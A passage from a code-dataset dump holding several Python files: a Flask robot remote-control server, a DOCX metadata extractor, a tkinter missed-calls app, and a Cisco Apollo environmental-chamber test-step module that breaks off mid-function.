% (end - start))\n","sub_path":"Forbes/ZhiLianSpider.py","file_name":"ZhiLianSpider.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56154827","text":"from flask import Flask, render_template, redirect, url_for, request\nimport pprint\nimport json\nfrom roboutil import Robo, Motor\n\napp = Flask(__name__)\nrobo = Robo(Motor(16, 18, 35), Motor(38, 40, 37))\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n@app.route('/command', methods=['POST'])\ndef processCommand():\n\tprint(\"processing post ----------------\")\n\n\tdata = request.data\n\t# decoded data: password=default&email=test%40example.com\n\tif not data:\n\t\tdata = request.form\n\n\tcommand = str(data['command'])\n\tprint (\"command is - \" + command)\n\trobo.process(command)\n\n\treturn 'ok'\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')","sub_path":"remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159019239","text":"import os\nfrom datetime import datetime\nfrom typing import Optional\n\nimport docx\nfrom docx.opc.exceptions import PackageNotFoundError\n\nfrom dedoc.data_structures.document_content import DocumentContent\nfrom dedoc.data_structures.document_metadata import DocumentMetadata\nfrom dedoc.data_structures.parsed_document import ParsedDocument\nfrom dedoc.metadata_extractor.concreat_metadata_extractors.base_metadata_extractor import BaseMetadataExtractor\n\n\nclass DocxMetadataExtractor(BaseMetadataExtractor):\n\n def __init__(self) -> None:\n super().__init__()\n\n def can_extract(self,\n doc: Optional[DocumentContent],\n directory: str,\n filename: str,\n converted_filename: str,\n original_filename: str,\n parameters: dict = None) -> bool:\n return converted_filename.endswith(\"docx\")\n\n def add_metadata(self,\n doc: Optional[DocumentContent],\n directory: str,\n filename: str,\n converted_filename: str,\n original_filename: str,\n parameters: dict = None) -> ParsedDocument:\n if parameters is None:\n parameters = {}\n file_path = os.path.join(directory, converted_filename)\n\n meta_info = self._get_base_meta_information(directory, filename, original_filename, parameters)\n metadata = DocumentMetadata(\n file_name=meta_info[\"file_name\"],\n file_type=meta_info[\"file_type\"],\n size=meta_info[\"size\"],\n access_time=meta_info[\"access_time\"],\n created_time=meta_info[\"created_time\"],\n modified_time=meta_info[\"modified_time\"],\n other_fields=self._get_docx_fields(file_path)\n )\n parsed_document = ParsedDocument(metadata=metadata, content=doc)\n return parsed_document\n\n def __convert_date(self, date: Optional[datetime]):\n if date is not None:\n return int(date.timestamp())\n return None\n\n def _get_docx_fields(self, file_path: str) -> dict:\n assert os.path.isfile(file_path)\n try:\n doc = docx.Document(file_path)\n properties = doc.core_properties\n parameters = {\n \"document_subject\": properties.subject,\n \"keywords\": properties.keywords,\n \"category\": properties.category,\n \"comments\": properties.comments,\n \"author\": properties.author,\n \"last_modified_by\": properties.last_modified_by,\n \"created_date\": self.__convert_date(properties.created),\n \"modified_date\": self.__convert_date(properties.modified),\n \"last_printed_date\": self.__convert_date(properties.last_printed),\n }\n return parameters\n except 
PackageNotFoundError:\n return {\"broken_docx\": True}\n","sub_path":"dedoc/metadata_extractor/concreat_metadata_extractors/docx_metadata_extractor.py","file_name":"docx_metadata_extractor.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"152567058","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPhoneApp\n\"\"\"\nfrom datetime import datetime\n\nimport tkinter as tk\n\nfrom .BaseClass import BaseClass\n\n\nclass PhoneApp(BaseClass):\n TIMEOUT = 30\n\n def __init__(self, db, canvas, width, height):\n super().__init__(db, canvas, width, height, self.TIMEOUT)\n\n self.time_font = tk.font.Font(family='Helvetica', size=28, weight='bold')\n self.number_font = tk.font.Font(family='Helvetica', size=28, weight='normal', slant='italic')\n self.date_font = tk.font.Font(family='Helvetica', size=18, weight='normal')\n\n self.summary = None\n self.btn_seen = None\n self.items = []\n\n self.phone = None\n\n self.reset_time = None\n\n def on_init(self):\n self.exit_button(0, 0, 100, 40)\n\n self.summary = self.text_button(100, 0, self.WIN_WIDTH-200, 90, \"...\")\n self.summary.set_font(self.TITLE_FONT)\n\n w = 600\n h = 80\n x = (self.WIN_WIDTH - w) / 2\n y = self.WIN_HEIGHT - h\n self.btn_seen = self.text_button(x, y, w, h, \"Gesehen\")\n self.btn_seen.set_font(self.BIG_BUTTON_FONT)\n\n def on_reset(self, custom_data):\n self.phone = custom_data[\"phone\"]\n\n # delete old entries\n for item in self.items:\n self.canvas.delete(item)\n self.items = []\n\n calls = self.phone.get_new()\n\n color = \"green\"\n x = 200\n y = 150\n\n today = datetime.now().strftime('%d.%m.%Y')\n self.reset_time = None\n displayed = 0\n\n for item in calls: # reversed(calls):\n if self.reset_time is None or item[\"time\"] > self.reset_time:\n self.reset_time = item[\"time\"]\n\n details = item[\"name\"]\n if details == \"\":\n details = item[\"number\"]\n\n txt = self.canvas.create_text(x, y, text=\"%s\" % item[\"time_str\"],\n anchor=tk.W, fill=color,\n font=self.time_font)\n self.items.append(txt)\n\n txt = self.canvas.create_text(x + 130, y, text=\"%s\" % details,\n anchor=tk.W, fill=\"#00ccff\",\n font=self.number_font)\n self.items.append(txt)\n\n if item[\"date_str\"] != today:\n txt = self.canvas.create_text(x - 10, y,\n text=\"%s\" % item[\"date_str\"],\n anchor=tk.E, fill=color,\n font=self.date_font)\n self.items.append(txt)\n\n displayed += 1\n y += 50\n if y > self.WIN_HEIGHT - 100:\n break\n\n if displayed < len(calls):\n self.summary.set_text(\"Neue Anrufe: {}/{}\".format(displayed, len(calls)))\n self.btn_seen.set_text(\"Gesehen / Nächste Seite\")\n else:\n self.summary.set_text(\"Neue Anrufe: {}\".format(len(calls)))\n self.btn_seen.set_text(\"Gesehen / Schließen\")\n\n def on_click(self, event):\n super().on_click(event)\n\n if self.btn_seen.hit(event.x, event.y):\n if self.reset_time is not None:\n self.phone.reset(self.reset_time)\n\n if len(self.phone.get_new()) != 0:\n self.reset_timeout()\n self.on_reset({\"phone\": self.phone})\n return\n\n self.close()\n\n# self.close()\n","sub_path":"User/rpi.py/src/apps/PhoneApp.py","file_name":"PhoneApp.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"485766702","text":"\"\"\" Environmental Stress Screen (ESS) Chamber Steps\n========================================================================================================================\n\nUse these steps for both 
PRE-SEQ and SEQ when operating a 2C/4C Chamber that uses the standard Cisco Library\nfor the Chamber driver.\nThese step functions were modeled after the 2C Template.\n\nAdditional features include:\n 1. Default profiles for Commercial, Industrial, and QuickSimulation\n 2. Product specific profiles can be used also (defined in the product definition)\n\n\n========================================================================================================================\n\"\"\"\n\n# Python\n# ------\nimport logging\nimport collections\nimport re\n\n# Apollo\n# ------\nimport apollo.libs.lib as aplib\nfrom apollo.libs import locking\nfrom apollo.engine import apexceptions\n\n# Cisco Lib\n# ---------\nfrom apollo.scripts.cisco.libs.chamber.chamber_interface import HOT, COLD, AMBIENT, DRY, ChamberInterface\n\n# BU Lib\n# ------\nimport apollo.scripts.entsw.libs.utils.common_utils as common_utils\n\n\n__title__ = \"EntSw ESS Chamber Steps\"\n__version__ = '2.0.0'\n__author__ = 'bborel'\n\n# Chamber globals\n# ---------------\nlast_action = None\nchamber_handler = None\nMONITOR_IN_TEST = True # NOTE: True if want to monitor temperature during test\nCHAMBER_SYNC_GROUP = 'ChamberSync1' # NOTE: Default if the group name is not defined in the x_config.py\nALLOWED_CORNERS = [HOT, COLD, AMBIENT, DRY]\nDEFAULT_MAX_CHAMBER_SLOTS = 16\n\nlog = logging.getLogger(__name__)\nChamberProfileDesc = collections.namedtuple('ChamberProfileDesc', 'temperature rate margin duration max_humidity')\n\nDEFAULT_PROFILES = {\n 'commercial': [\n ('COLD', {'ramp': ChamberProfileDesc(0, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(50, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(28, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 1, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(25, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 1, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)})],\n 'commercial_yinhe': [\n ('COLD', {'ramp': ChamberProfileDesc(0, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(50, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(28, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 1, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(25, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 1, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)})],\n 'industrial': [\n ('COLD', {'ramp': ChamberProfileDesc(-30, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(60, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(25, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(35, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': 
ChamberProfileDesc(None, None, 2, None, 0)})],\n 'quicksim': [\n ('COLD', {'ramp': ChamberProfileDesc(22, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(28, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(25, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(26, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)})],\n}\n\n\n# ======================================================================================================================\n# STEPS\n# ======================================================================================================================\ndef step__chamber_init(first_init=True, fi_action='ask', profile_type=None, corners=None):\n \"\"\"\n Chamber initialize - create object and set temperature profile\n :param (bool) first_init: True if this is first initialization of the chamber.\n If this is done in PRE-SEQ, then it should be set to False in SEQ.\n :param (str) fi_action:\n :param (str) profile_type: Recognized profile types.\n :return:\n \"\"\"\n global chamber_handler\n\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Init.\")\n\n profile_table = {\n 'commercial': chamber_default_commercial_profile,\n 'commercial_yinhe': chamber_default_commercial_yinhe_profile,\n 'industrial': chamber_default_industrial_profile,\n 'productdef': chamber_product_profile,\n 'quicksim': chamber_quick_simulation_profile\n }\n if profile_type:\n profile_type = profile_type.lower()\n if profile_type not in profile_table.keys():\n log.error(\"Chamber profile type '{0}' not recognized.\".format(profile_type))\n raise apexceptions.ApolloException\n else:\n log.debug(\"Chamber profile will default to the profile in the product definition.\")\n profile_type = 'productdef'\n\n sync_group = get_chamber_sync_group()\n\n log.info(\"Chamber Profile Type = {0}\".format(profile_type))\n log.info(\"Chamber Profile Name = {0}\".format(profile_table[profile_type].__name__))\n log.info(\"Container Sync Groups = {0}\".format(aplib.get_container_sync_groups()))\n log.info(\"Chamber Target Sync Group = {!r}\".format(sync_group))\n log.info(\"Container = {0}\".format(aplib.get_my_container_key()))\n\n # All containers need to sync up\n log.debug(\"Chamber Init sync 1...\")\n sync_chamber_group(sync_group)\n\n # Init the Chamber\n log.debug(\"Performing ChamberInterface.init...\")\n if not chamber_handler:\n log.debug(\"The global chamber_handler is new.\")\n else:\n log.debug(\"The global chamber_handler will be reset.\")\n chamber_handler = None\n chamber_handler = ChamberInterface.init(profile=profile_table[profile_type],\n connection=aplib.conn.Chamber,\n sync_group=sync_group,\n logger=log,\n save_to_chart='entsw_thermal.svg',\n first_init=first_init,\n fi_action=fi_action)\n log.debug(\"Chamber Init sync 2...\")\n sync_chamber_group(sync_group)\n\n log.debug(\"Handler Profile\")\n for k, v in chamber_handler.profiles.items():\n log.debug(\" {0:<20}: {1}\".format(k, v))\n\n log.debug(\"STEP: Chamber Init PASSED.\")\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_start():\n \"\"\"\n Chamber start - config chamber and start to run\n :return:\n 
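NOTE: assumes the global chamber_handler was already set by step__chamber_init().\n    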
\"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Start.\")\n log.debug(\"chamber_handler = {0}\".format(chamber_handler))\n ChamberInterface.start(chamber_handler)\n log.debug(\"STEP: Chamber Start PASSED\")\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_final():\n \"\"\"\n Go to room temperature, and stop chamber\n Only allow the last container do chamber finalization\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Final.\")\n ChamberInterface.stop(chamber_handler, AMBIENT, DRY, -10)\n log.debug(\"STEP: Chamber Final {0}\".format(aplib.apdicts.stepdict['current_status']))\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_ramp(action=AMBIENT):\n \"\"\"\n Chamber temperature ramp up/down to the temperature defined in profile\n :param action\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n msg = \"STEP: Chamber Ramp --> {0}.\".format(action)\n log.debug(msg)\n log.debug(\"-\" * len(msg))\n log.debug(\"Global Corners = {0}\".format(get_global_corners()))\n log.debug(\"Global Profile\")\n for k, v in get_global_profile().items():\n log.debug(\" {0:<20}: {1}\".format(k, v))\n log.debug(\"Handler Profile\")\n for k, v in chamber_handler.profiles.items():\n log.debug(\" {0:<20}: {1}\".format(k, v))\n\n global last_action\n last_action = action\n ChamberInterface.ramp(chamber_handler, action=action)\n log.debug(\"STEP: Chamber Ramp PASSED\")\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_start_monitor():\n \"\"\"\n Start to monitor temperature in chamber during test.\n If set MONITOR_IN_TEST as True, this step will be bypassed.\n :return:\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Start Monitor.\")\n log.debug(\"chamber_handler = {0}\".format(chamber_handler))\n ChamberInterface.monitor_start(chamber_handler, monitor_in_test=MONITOR_IN_TEST)\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_stop_monitor():\n \"\"\"\n Stop to monitor temperature in chamber after test is done.\n If set MONITOR_IN_TEST as True, this step will be bypassed.\n :return:\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Stop Monitor.\")\n ChamberInterface.monitor_stop(monitor_in_test=MONITOR_IN_TEST)\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef prestep__chamber_staging(area):\n \"\"\" Chamber Staging\n Run by Supercontainer\n Operator selects which UUT slots to run for the chamber.\n :param (str) area: Test Area\n :return:\n \"\"\"\n info = aplib.get_pre_sequence_info()\n active_chamber_slots = '0'\n max_chamber_slots = len(info.containers)\n log.debug(\"MAX Chamber SLots = {0}\".format(max_chamber_slots))\n ans_good = False\n while not ans_good:\n ans = aplib.ask_question(\"Enter sequential UUT slots for chamber testing [Default = 1-{0}]:\\n\"\n \" Ex1. 1-10,12,15\\n\"\n \" Ex2. 2,4,6,8\\n\"\n \" Ex3. 
2-11\\n\".format(max_chamber_slots))\n ans = '1-{0}'.format(max_chamber_slots) if ans == '' else ans\n ans_good = True if re.match(\"(^[0-9]+[0-9,\\-]*$)\", ans) else False\n if ans.upper() == 'ABORT':\n raise apexceptions.AbortException(\"Operator aborted chamber staging of UUT slots.\")\n\n active_chamber_slots = common_utils.expand_comma_dash_num_list(ans)\n if max(active_chamber_slots) > max_chamber_slots:\n log.warning(\"Chamber UUT slot selection exceeds maximum available; please re-enter.\")\n ans_good = False\n\n log.debug(\"Active Chamber SLots accepted: {0}\".format(active_chamber_slots))\n ACTIVECS_KEY, MAXCS_KEY = get_chamber_slots_keys()\n aplib.cache_data(ACTIVECS_KEY, active_chamber_slots)\n aplib.cache_data(MAXCS_KEY, str(max_chamber_slots))\n\n # Reset globals\n reset_globals()\n\n return aplib.PASS\n\n\ndef prestep__set_chamber_attributes():\n log.debug(\"Chamber attribute processing...\")\n set_global_corners()\n set_global_profile()\n return aplib.PASS\n\n\ndef prestep__chamber_post_staging():\n ACTIVECS_KEY, _ = get_chamber_slots_keys()\n active_chamber_slots = aplib.get_cached_data(ACTIVECS_KEY)\n log.debug(\"Active chamber slots: {0}\".format(active_chamber_slots))\n return aplib.PASS\n\n\n# ======================================================================================================================\n# Support Functions\n# ======================================================================================================================\ndef __load_chamber_profile(obj, chamber_profile):\n \"\"\" (INTERNAL) Driver to load a profile to the chamber handler.\n DO NOT call this directly, use the chamber_xxx_profile() functions.\n :param obj: chamber handler object\n :param chamber_profile:\n :return:\n \"\"\"\n log.info(\"Installing chamber profile to handler...\")\n for corner in chamber_profile.keys():\n if corner in ALLOWED_CORNERS:\n ramp = chamber_profile[corner]['ramp']\n soak = chamber_profile[corner]['soak']\n test = chamber_profile[corner]['test']\n obj.set_profile_ramp(corner, temperature=ramp.temperature, rate=ramp.rate, margin=ramp.margin, max_humidity=ramp.max_humidity)\n obj.set_profile_soak(corner, margin=soak.margin, duration=soak.duration, max_humidity=soak.max_humidity)\n obj.set_profile_test(corner, margin=test.margin, max_humidity=test.max_humidity)\n log.debug(\"Corner = {0}\".format(corner))\n log.debug(\" Ramp = {0}\".format(ramp))\n log.debug(\" Soak = {0}\".format(soak))\n else:\n log.warning(\"An unknown corner ({0}) was specified in the profile. It will NOT be loaded to the handler.\".format(corner))\n return True\n\n\ndef show_container_info():\n container_name = aplib.get_container_name()\n aplib.get_container_status(container_name)\n container_key = aplib.get_my_container_key()\n station_key = '|'.join(container_key.split('|')[:-1])\n log.debug(\"Container = {0}\".format(container_name))\n log.debug(\"Station = {0}\".format(station_key))\n log.debug(\"Cfg = {0}\".format(aplib.apdicts.configuration_data))\n return\n\n\ndef sync_chamber_group(group_name):\n # All containers need to sync up\n try:\n aplib.sync_group(group_name=group_name, timeout=300)\n except apexceptions.TimeoutException as e:\n log.error(e.message)\n msg = \"Container could not sync up chamber group.\"\n log.error(msg)\n return False, msg + e.message\n return True, None\n\n\ndef get_chamber_sync_group():\n \"\"\" Get Chamber Sync Group\n Tiered get (first occurance)\n 1. 'ChamberSync' in the container's list of sync groups, OR\n 2. 
\"CHAMBER_SYNC_GROUP\" key in the configuration_data for the station, OR\n 3. Use the default: CHAMBER_SYNC_GROUP.\n :return:\n \"\"\"\n global CHAMBER_SYNC_GROUP\n log.debug(\"Determine sync group for chamber...\")\n\n for k in aplib.get_container_sync_groups():\n if 'ChamberSync'.upper() in k.upper():\n CHAMBER_SYNC_GROUP = k\n log.debug(\"Using syncgroup name from existing container sync groups.\")\n break\n else:\n csg = aplib.apdicts.configuration_data.get('CHAMBER_SYNC_GROUP', None).upper()\n if csg:\n log.debug(\"Using syncgroup name from cfg data.\")\n CHAMBER_SYNC_GROUP = csg\n else:\n log.debug(\"Using default syncgroup name.\")\n\n log.debug(\"Calculated Sync Group Name = {0}\".format(CHAMBER_SYNC_GROUP))\n log.debug(\"The CHAMBER_SYNC_GROUP is now set.\")\n return CHAMBER_SYNC_GROUP\n\n\ndef chamber_product_profile(obj):\n \"\"\" Product Chamber Profile\n Pull in the profile from the cached data global space.\n It will be referenced by 'chamber_profile_' + station key\n The global profile MUST have been resolved in the PRE-SEQ after loading the product definitions\n for each UUT in the chamber.\n See the DEFAULT_PROFILES for an example of the required format.\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading custom chamber profile...\")\n chamber_profile = collections.OrderedDict(get_global_profile())\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_default_commercial_profile(obj):\n \"\"\" Default Commercial Chamber Profile\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading default commercial chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['commercial'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_default_commercial_yinhe_profile(obj):\n \"\"\" Default Commercial Chamber Profile\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading default commercial_yinhe chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['commercial_yinhe'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_default_industrial_profile(obj):\n \"\"\" Default Industrial Chamber Profile\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading default industrial chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['industrial'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_quick_simulation_profile(obj):\n \"\"\" Quick Simulation Chamber Profile\n Note: *** NOT FOR PRODUCTION ***\n Use this for unittest chamber simulation.\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading quick simulation chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['quicksim'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef reset_globals():\n \"\"\" Reset Globals\n Used by Supercontainer in SC-PreSeq\n \"\"\"\n log.debug(\"Chamber globals: reset...\")\n container = aplib.get_my_container_key()\n S_KEY = '_'.join(container.split('|')[:-1])\n cp_key = 'chamber_profile_' + S_KEY\n cc_key = 'chamber_corners_' + S_KEY\n aplib.cache_data(cp_key, None)\n aplib.cache_data(cc_key, None)\n log.debug(\"Chamber globals reset done!\")\n return\n\n\ndef set_global_profile(forced_profile=None):\n \"\"\" Set Global Chamber Profile\n Used by the UUT Container PRE-SEQ.\n This sets the profile to be used by ALL UUTs in the chamber via a global data cache.\n IMPORTANT: Global cache key is the 
station path (i.e. chamber).\n Differing product families are allowed to run but their profile selections MUST match; if not then it will abort.\n :param (list) forced_profile:\n :return:\n \"\"\"\n\n log.debug(\"Global Profile: set...\")\n container = aplib.get_my_container_key()\n # Source the profile.\n try:\n udd = aplib.apdicts.userdict.get('udd')\n if not udd:\n log.error(\"The UutDescriptor Dict was not available.\")\n log.error(\"Please confirm proper application of the application software!\")\n raise Exception(\"The UutDescriptor Dict was not available.\")\n\n chamber_profile = udd.get('chamber_profile')\n\n if forced_profile:\n profile = collections.OrderedDict(forced_profile)\n log.debug(\"Chamber Profile Source: FORCED.\")\n elif chamber_profile:\n profile = collections.OrderedDict(chamber_profile)\n log.debug(\"Chamber Profile Source: UUT DESCRIPTOR.\")\n else:\n log.warning(\"No UutDescriptor chamber_profile, or forced_profile available.\")\n log.warning(\"Check the product definitions and common definition for 'chamber_profile'.\")\n log.warning(\"The default commercial profile will be used.\")\n profile = collections.OrderedDict(DEFAULT_PROFILES['commercial'])\n except (KeyError, AttributeError):\n log.error(\"Chamber profile data is not available or not in correct form.\")\n return False\n\n log.debug('-' * 50)\n log.debug(\"{0} : Chamber Profile = {1}\".format(container, profile))\n\n # Get the current profile definition (possibly set by another container in the same chamber)\n # Global cache key is the station path (i.e. chamber)\n S_KEY = '_'.join(container.split('|')[:-1])\n cp_key = 'chamber_profile_' + S_KEY\n with locking.named_priority_lock('__profile__' + S_KEY):\n try:\n log.debug(\"Chamber profile cache key (set) = {0}\".format(cp_key))\n established_profile = aplib.get_cached_data(cp_key)\n except (KeyError, apexceptions.ApolloException):\n established_profile = None\n\n if not forced_profile:\n # Save the product-specific profile selections for use by SEQ.\n if not established_profile:\n established_profile = profile\n aplib.cache_data(cp_key, established_profile)\n log.debug(\"*** A new chamber profile set has been established. ***\")\n\n # All UUT profile definitions must match. This allows different PIDs in the same chamber BUT requires\n # them to all have the same profile definition.\n if profile != established_profile:\n log.error(\"Chamber profile: REJECTED!\")\n log.error(\"There is a mismatch of chamber_profiles in {0}. This is NOT allowed.\".format(container))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"MISMATCH of chamber profiles in {0}.\".format(container))\n else:\n log.debug(\"Chamber profile: ACCEPTED. {0}\".format(established_profile))\n else:\n aplib.cache_data(cp_key, profile)\n log.debug(\"Chamber profile: FORCED. {0}\".format(profile))\n\n return True\n\n\ndef get_global_profile(container_key=None):\n \"\"\" Get Profile\n This is strictly a read of the global cache; therefore no locking required.\n IMPORTANT: This is done by sequence_definition() so MUST be compatible with Apollo main process.\n Global cache key is the station path (i.e. 
chamber).\n :return:\n \"\"\"\n log.debug(\"Global Profile: get...\")\n if not container_key:\n log.debug(\"Need to get container key...\")\n container_key = aplib.get_my_container_key()\n S_KEY = '_'.join(container_key.split('|')[:-1])\n cp_key = 'chamber_profile_' + S_KEY\n try:\n log.debug(\"Global profile cache key (get) = {0}\".format(cp_key))\n chamber_profile = aplib.get_cached_data(cp_key)\n except (KeyError, apexceptions.ApolloException):\n log.exception(\"Problem with chamber profile in global cache.\")\n chamber_profile = None\n\n if not chamber_profile:\n log.error(\"Global profile: ABSENT!\")\n log.error(\"Global cache key = {0}\".format(cp_key))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"Chamber profile: ABSENT!\")\n else:\n log.debug(\"Global profile: PRESENT.\")\n return chamber_profile\n\n\ndef set_global_corners(forced_corners=None):\n \"\"\" Set Global ChamberCorners\n Used by the UUT Container PRE-SEQ.\n This sets the corners to be used by ALL UUTs in the chamber via a global data cache.\n IMPORTANT: Global cache key is the station path (i.e. chamber).\n Differing product families are allowed to run but their corner selections MUST match; if not then it will abort.\n\n Example set in product_definition:\n 'chamber_corners': [('NTNV', False), ('HTLV', True), ('HTHV', True), ('LTLV', True)]\n\n Example of globally saved after processing:\n OrderedDict([('NTNV', ('AMBIENT', 'NOMINAL', False)),\n ('HTLV', ('HOT', 'LOW', True)),\n ('HTHV', ('HOT', 'HIGH', True)),\n ('LTLV', ('COLD', 'LOW', True))])\n\n :param (list) forced_corners:\n :return:\n \"\"\"\n log.debug(\"Global Corners: set...\")\n # Check for a product-specific corner definition.\n _lookup = {'HT': HOT, 'LT': COLD, 'NT': AMBIENT, 'HV': 'HIGH', 'LV': 'LOW', 'NV': 'NOMINAL'}\n container = aplib.get_my_container_key()\n\n try:\n udd = aplib.apdicts.userdict.get('udd')\n if not udd:\n log.error(\"The UutDescriptor Dict was not available.\")\n log.error(\"Please confirm proper application of the application software!\")\n raise Exception(\"The UutDescriptor Dict was not available.\")\n\n chamber_corners = udd.get('chamber_corners')\n\n if forced_corners:\n listed_corners = collections.OrderedDict(forced_corners)\n log.debug(\"Chamber Corners Source: FORCED.\")\n elif chamber_corners:\n listed_corners = collections.OrderedDict(chamber_corners)\n log.debug(\"Chamber Corners Source: UUT DESCRIPTOR.\")\n else:\n log.warning(\"No UutDescriptor chamber_corners, or forced_corners available.\")\n log.warning(\"Check the product definitions and common definition for 'chamber_corners'.\")\n log.warning(\"The default '2-Corner' sequence (HTLV, LTHV) will be used.\")\n listed_corners = [('LTHV', True), ('HTLV', True)]\n\n processed_corners = []\n if listed_corners:\n for lc in listed_corners:\n name = lc[0] if isinstance(lc, tuple) else lc\n adt = lc[1] if isinstance(lc, tuple) and len(lc) > 1 else False\n if len(name) == 4:\n temp = _lookup.get(name[:2], AMBIENT)\n volt = _lookup.get(name[2:4], 'NOMINAL')\n elif len(name) == 2:\n temp = _lookup.get(name, AMBIENT)\n volt = 'NOMINAL'\n else:\n temp = AMBIENT\n volt = 'NOMINAL'\n processed_corners.append((name, (temp, volt, adt)))\n corners = collections.OrderedDict(processed_corners) if processed_corners else None\n except (KeyError, AttributeError):\n log.warning(\"Chamber corner data is not available or not in correct form.\")\n return False\n\n log.debug('-' * 20)\n 
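# At this point listed_corners entries have been expanded through _lookup,\n    # e.g. ('HTLV', True) -> ('HTLV', ('HOT', 'LOW', True)) and a bare 'NT' -> ('NT', ('AMBIENT', 'NOMINAL', False)).\n    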
